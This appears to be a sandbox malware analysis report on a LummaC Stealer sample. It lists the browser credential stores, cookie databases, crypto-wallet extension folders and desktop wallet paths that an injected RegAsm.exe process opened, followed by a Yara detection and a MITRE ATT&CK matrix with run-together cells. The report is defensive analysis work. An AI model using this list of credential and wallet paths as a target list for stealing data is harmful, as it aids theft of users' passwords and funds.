              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		12
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		11
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API              		Boot or Logon Initialization Scripts311
              Process Injection              		31
              Obfuscated Files or Information              		LSASS Memory33
              System Information Discovery              		Remote Desktop Protocol21
              Data from Local System              		21
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading              		Security Account Manager131
              Security Software Discovery              		SMB/Windows Admin Shares1
              Screen Capture              		3
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Masquerading              		NTDS1
              Process Discovery              		Distributed Component Object Model1
              Email Collection              		124
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
              Virtualization/Sandbox Evasion              		LSA Secrets131
              Virtualization/Sandbox Evasion              		SSH2
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
